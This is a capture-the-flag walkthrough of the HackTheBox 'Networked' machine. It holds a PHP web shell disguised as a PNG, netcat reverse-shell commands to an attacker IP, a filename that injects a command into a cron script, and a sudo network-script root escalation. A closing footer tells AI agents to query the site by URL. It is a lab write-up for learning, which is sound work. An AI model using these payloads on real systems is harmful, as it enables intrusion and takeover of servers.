# Networked

<figure><img src="/files/908RAESO9X01hoghdzs7" alt=""><figcaption></figcaption></figure>

## Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

> nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.146 -oN allPorts

* `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
* `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second.
* `-p-` scanning the entire port range, **from 1 to 65535**.
* `-T5` **insane** mode, it is the fastest mode of the nmap time template.
* `-Pn` assume the host is **online**.
* `-n` scan without reverse **DNS** resolution.
* `-oN` **save** the scan result into a file, in this case the *allports* file.

{% code overflow="wrap" %}

```bash
# Nmap 7.92 scan initiated Thu Sep 15 02:21:14 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN allPorts 10.10.10.146
Nmap scan report for 10.10.10.146
Host is up (0.059s latency).
Not shown: 65500 filtered tcp ports (no-response), 32 filtered tcp ports (host-prohibited)
PORT    STATE  SERVICE
22/tcp  open   ssh
80/tcp  open   http
443/tcp closed https

# Nmap done at Thu Sep 15 02:21:40 2022 -- 1 IP address (1 host up) scanned in 26.57 seconds
```

{% endcode %}

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

> nmap -sC -sV -p22,80,443 10.10.10.146 -oN targeted

* `-sC` performs the scan using the default set of **scripts**.
* `-sV` enables **version** detection.
* `-oN` **save** the scan result into file, in this case the *targeted* file.

{% code overflow="wrap" %}

```bash
# Nmap 7.92 scan initiated Thu Sep 15 02:20:57 2022 as: nmap -sCV -p22,80,443 -oN targeted 10.10.10.146
Nmap scan report for 10.10.10.146
Host is up (0.038s latency).

PORT    STATE  SERVICE VERSION
22/tcp  open   ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 22:75:d7:a7:4f:81:a7:af:52:66:e5:27:44:b1:01:5b (RSA)
|   256 2d:63:28:fc:a2:99:c7:d4:35:b9:45:9a:4b:38:f9:c8 (ECDSA)
|_  256 73:cd:a0:5b:84:10:7d:a7:1c:7c:61:1d:f5:54:cf:c4 (ED25519)
80/tcp  open   http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
443/tcp closed https

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Sep 15 02:21:07 2022 -- 1 IP address (1 host up) scanned in 9.52 seconds
```

{% endcode %}

The website just shows a simple message.

<figure><img src="/files/3JOGNrI1esOr0TZRMxTk" alt=""><figcaption></figcaption></figure>

I found a few files and subdirectories with gobuster.

> gobuster dir -u <http://10.10.10.146> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 -x txt,php

* `dir` enumerates **directories or files**.
* `-u` the **target** URL.
* `-w` path to the **wordlist**.
* `-t` number of current **threads**, in this case 200 threads.
* `-x` file **extensions** to search for.

```
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.146/
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              txt,php
[+] Timeout:                 10s
===============================================================
2022/09/15 16:40:13 Starting gobuster in directory enumeration mode
===============================================================
/uploads              (Status: 301) [Size: 236] [--> http://10.10.10.146/uploads/]
/upload.php           (Status: 200) [Size: 169]                                   
/lib.php              (Status: 200) [Size: 0]                                     
/backup               (Status: 301) [Size: 235] [--> http://10.10.10.146/backup/] 
/photos.php           (Status: 200) [Size: 1302]                                  
                                                                                  
===============================================================
2022/09/15 16:41:55 Finished
===============================================================
```

The `/backup` directory shows a file called `backup.tar`. Let's download it.

<figure><img src="/files/G8kLcfb3JiSAWjClPVFq" alt=""><figcaption></figcaption></figure>

After downloading the file, decompress it.

> tar -xf backup.tar

* `-x` **extract** files from an archive.
* `-f` specific **file**.

Now we have four PHP files that seems to be on the website.

> ls | grep php

```
index.php
lib.php
photos.php
upload.php
```

We could upload files in the `/upload.php` page.

<figure><img src="/files/azVqMDiIFG6nuRwu5rNG" alt=""><figcaption></figcaption></figure>

The `/photos.php` page shows the uploaded files.

<figure><img src="/files/822CGv8BxivPH0ovlXn3" alt=""><figcaption></figcaption></figure>

## Exploitation

As a test, I'm going to upload an image called `penguin.png`.

<figure><img src="/files/FcGa5ygP7k1iB1mA8pho" alt=""><figcaption></figcaption></figure>

The file gets uploaded successfully.

<figure><img src="/files/jNEZUAGfS26EIf3YsFqI" alt=""><figcaption></figcaption></figure>

And we can see the image in the `/photos.php` page.

<figure><img src="/files/mOf78eQek9WjrWcwdyQs" alt=""><figcaption></figcaption></figure>

If I try to upload the same image, but with the name `penguin.php.png`, it also works.

<figure><img src="/files/SRYC860VWhkKrp5MtVG1" alt=""><figcaption></figcaption></figure>

And we can see it in the gallery.

<figure><img src="/files/RDoZdno7utp3cdIy3MjI" alt=""><figcaption></figcaption></figure>

Something we could do to be able to run commands on the server, create a file called `webshell.php.png` with some PHP code.

> nano webshell.php.png

```php
AAAAAAAAAAAAAAAAAAAAAAAAAA
<?php echo "<pre>" . system($_GET['cmd']) . "</pre>";?>
```

Now, modify the file with *hexeditor*, and add the magic numbers of *PNG* files which are `89 50 4E 47 0D 0A 1A 0A`.

> hexeditor webshell.php.png

```
00000000  89 50 4E 47  0D 0A 1A 0A   41 41 41 41  41 41 41 41                                                     .PNG....AAAAAAAA
00000010  41 41 41 41  41 41 41 41   41 41 0A 3C  3F 70 68 70                                                     AAAAAAAAAA.<?php
00000020  20 65 63 68  6F 20 22 3C   70 72 65 3E  22 20 2E 20                                                      echo "<pre>" . 
00000030  73 79 73 74  65 6D 28 24   5F 47 45 54  5B 27 63 6D                                                     system($_GET['cm
00000040  64 27 5D 29  20 2E 20 22   3C 2F 70 72  65 3E 22 3B                                                     d']) . "</pre>";
00000050  3F 3E 0A                                                                                                ?>.
```

Now, upload it to the website.

<figure><img src="/files/nf6USeHcVq84YdJ89XHL" alt=""><figcaption></figcaption></figure>

It has uploaded successfully, and we can access it.

<figure><img src="/files/j42608veyyWWF69km2EK" alt=""><figcaption></figcaption></figure>

Finally, we can execute commands on the system.

> <http://10.10.10.146/uploads/10\\_10\\_14\\_11.php.png?cmd=whoami>

<figure><img src="/files/DETOZguafgiXOb1QyBzg" alt=""><figcaption></figcaption></figure>

Time to get a shell. Let's set a *netcat* listener on port *4444*.

> nc -lvnp 4444

* `-l` **listen** mode.
* `-v` **verbose** mode.
* `-n` **numeric-only** IP, no DNS resolution.
* `-p` specify the **port** to listen on.

Now, if we access the following URL, we should get a shell as `apache`.

> <http://10.10.10.146/uploads/10\\_10\\_14\\_11.php.png?cmd=nc> -e /bin/bash 10.10.14.11 4444

```
listening on [any] 4444 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.146] 59798
whoami
apache
```

## Privilege Escalation

First, let's set an interactive *TTY* shell.

> script /dev/null -c /bin/bash&#x20;

Then I press `Ctrl+Z` and execute the following command on my local machine:

> stty raw -echo; fg
>
> reset
>
> Terminal type? xterm

Next, I export a few variables:

> export TERM=xterm
>
> export SHELL=bash

Finally, I run the following command in our local machine:

> stty size

```
51 236
```

And set the proper dimensions in the victim machine:

> stty rows 51 columns 236

As we can see, we have to become the `guly` user because only he can read the user flag.

> ls -la /home/guly

```
total 28
drwxr-xr-x. 2 guly guly 159 Jul  9  2019 .
drwxr-xr-x. 3 root root  18 Jul  2  2019 ..
lrwxrwxrwx. 1 root root   9 Jul  2  2019 .bash_history -> /dev/null
-rw-r--r--. 1 guly guly  18 Oct 30  2018 .bash_logout
-rw-r--r--. 1 guly guly 193 Oct 30  2018 .bash_profile
-rw-r--r--. 1 guly guly 231 Oct 30  2018 .bashrc
-rw-------  1 guly guly 639 Jul  9  2019 .viminfo
-r--r--r--. 1 root root 782 Oct 30  2018 check_attack.php
-rw-r--r--  1 root root  44 Oct 30  2018 crontab.guly
-r--------. 1 guly guly  33 Oct 30  2018 user.txt
```

In his home directory there is also a *crontab* file which executes the `check_attack.php` file every three minutes.

> cat /home/guly/crontab.guly

```
*/3 * * * * php /home/guly/check_attack.php
```

The `check_attack.php` file removes all the files in the `/var/www/html/uploads/` directory, one by one, which name doesn't contain an IP address.

> cat /home/guly/check\_attack.php

```php
<?php
require '/var/www/html/lib.php';
$path = '/var/www/html/uploads/';
$logpath = '/tmp/attack.log';
$to = 'guly';
$msg= '';
$headers = "X-Mailer: check_attack.php\r\n";

$files = array();
$files = preg_grep('/^([^.])/', scandir($path));

foreach ($files as $key => $value) {
        $msg='';
  if ($value == 'index.html') {
        continue;
  }
  #echo "-------------\n";

  #print "check: $value\n";
  list ($name,$ext) = getnameCheck($value);
  $check = check_ip($name,$value);

  if (!($check[0])) {
    echo "attack!\n";
    # todo: attach file
    file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);

    exec("rm -f $logpath");
    exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
    echo "rm -f $path$value\n";
    mail($to, $msg, $msg, $headers, "-F$value");
  }
}

?>
```

We could exploit this script by doing command injection. We could create a file called `; nc -c 10.10.14.11 4444;`, so when the script tries to delete it, it will send us a reverse shell.

> cd /var/www/html/uploads
>
> touch "; nc -c bash 10.10.14.11 4444"

Now, if we set a *netcat* listener on port *4444*, and wait for a bit, we should get a shell as, and then we'll be able to grab the user flag.

> nc -lvnp 4444

```
listening on [any] 4444 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.146] 59804
whoami
guly
cat /home/guly/user.txt
526cfc2305f17faaacecf212c57d71c5
```

Let's set a proper TTY again, the same way we did before. If we check the sudo privileges, we'll see that we can execute a script as root.

> sudo -l

```
Matching Defaults entries for guly on networked:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
    env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User guly may run the following commands on networked:
    (root) NOPASSWD: /usr/local/sbin/changename.sh
```

The script is writing some data into a file called `/etc/sysconfig/network-scripts/ifcfg-guly`.

> cat /usr/local/sbin/changename.sh

{% code overflow="wrap" %}

```bash
#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoF

regexp="^[a-zA-Z0-9_\ /-]+$"
                                                                                                                                  
for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do                                                                           
        echo "interface $var:"                                                                                                    
        read x                                                                                                                    
        while [[ ! $x =~ $regexp ]]; do                                                                                           
                echo "wrong input, try again"                                                                                     
                echo "interface $var:"                                                                                            
                read x                                                                                                            
        done                                                                                                                      
        echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly                                                                 
done                                                                                                                              
                                                                                                                                  
/sbin/ifup guly0
```

{% endcode %}

As this [article](https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f) explains, there is a way to execute commands as *root*. We'll have to run the `/usr/local/sbin/changename.sh` script with *sudo* privileges, and give `test bash` as the value of the `interface NAME`. Then fill all the other interfaces with random data.  Once we get the shell, all we have to do is reap the harvest and take the root flag.

> sudo /usr/local/sbin/changename.sh

```
interface NAME:
test bash
interface PROXY_METHOD:
test
interface BROWSER_ONLY:
test
interface BOOTPROTO:
test
[root@networked network-scripts]# whoami
root
[root@networked network-scripts]# cat /root/root.txt 
0a8ecda83f1d81251099e8ac3d0dcb82
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://alfa8sa.gitbook.io/htb-writeups/linux-machines/networked.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.